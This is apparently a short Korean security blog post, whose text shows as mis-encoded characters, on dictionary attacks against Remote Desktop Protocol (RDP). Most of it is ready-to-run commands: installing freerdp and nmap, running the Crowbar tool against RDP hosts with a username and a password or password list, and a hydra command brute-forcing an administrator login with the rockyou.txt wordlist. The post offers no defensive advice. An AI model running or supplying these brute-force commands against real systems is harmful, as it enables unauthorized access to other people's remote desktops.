๋ณธ๋ฌธ ๋ฐ”๋กœ๊ฐ€๊ธฐ
๐Ÿ”’์ •๋ณด๋ณด์•ˆ/๋„คํŠธ์›Œํฌ ๋ณด์•ˆ

๋„คํŠธ์›Œํฌ ํ•ดํ‚น - rdp ์‚ฌ์ „ ๊ณต๊ฒฉ

by Janger 2021. 12. 14.
728x90
๋ฐ˜์‘ํ˜•

์žฌํƒ๊ทผ๋ฌด๊ฐ€ ์žฆ์•„์ง„ ์š”์ฆ˜ RDP(Remote Desktop Protocol)๋ฅผ ์‚ฌ์šฉํ•˜๋Š” ์œ ์ €๋“ค์ด ๊ฝค๋‚˜ ๋งŽ์•„์กŒ๋‹ค. 

 

 

 

์ด๋Ÿฐ ์‹œ๋Œ€์˜ ํ๋ฆ„์„ ๋งž์ถฐ์„œ RDP๋ฅผ ๊ณต๊ฒฉํ•˜๋Š” ๋‹ค์–‘ํ•œ ๊ณต๊ฒฉ ๋„๊ตฌ๋“ค์ด ์ƒ๊ฒจ๋‚ฌ๋Š”๋ฐ, ๊ทธ์ค‘ ํ•˜๋‚˜๊ฐ€ ์‚ฌ์ „ ๊ณต๊ฒฉ์„ ๋„์™€์ฃผ๋Š” Crowbar๊ฐ€ ์žˆ๋‹ค. 

 

 

๋„๊ตฌ๋ฅผ ์‚ฌ์šฉํ•˜๊ธฐ ์ด์ „์— ๋ฆฌ๋ˆ…์Šค์— freerdp๊ฐ€ ์„ค์น˜๋˜์–ด์žˆ์–ด์•ผ ํ•จ

sudo apt-get install -y nmap openvpn freerdp-x11 vncviewer

 

 

[์‚ฌ์šฉ ๋ช…๋ น์–ด]

./crowbar.py -b rdp -s 192.168.2.182/32 -u admin -c Aa123456

 

./crowbar.py -b rdp -s 192.168.2.250/32 -u localuser -C ~/Desktop/passlist

 

 

 

hydra๋กœ๋„ ๊ฐ€๋Šฅํ•˜๋‹ค. 

 

[์‚ฌ์šฉ ๋ช…๋ น์–ด]

hydra -t 1 -V -f -l administrator -P rockyou.txt rdp://192.168.1.1

 

 

crowbar ๊นƒํ—ˆ๋ธŒ: 

https://github.com/galkan/crowbar

 

GitHub - galkan/crowbar: Crowbar is brute forcing tool that can be used during penetration tests. It is developed to support pro

Crowbar is brute forcing tool that can be used during penetration tests. It is developed to support protocols that are not currently supported by thc-hydra and other popular brute forcing tools. -...

github.com

 

์ฐธ๊ณ : 

https://www.pwndefend.com/2018/07/24/hail-hydra-rdp-brute-forcing-with-hydra/

 

Hail Hydra – RDP brute forcing with HYDRA – PwnDefend

Securing services requires a broad range of knowledge of operating systems, networking, protocols and offensive capabilities. So I thought I would demonstrate some testing methods to show how a control is effective in blocking certain types of attack, so h

www.pwndefend.com

 

์ฐธ๊ณ  ์˜์ƒ: 

https://www.youtube.com/watch?v=ql7opGQ3czE&ab_channel=LoiLiangYang 

 

728x90
๋ฐ˜์‘ํ˜•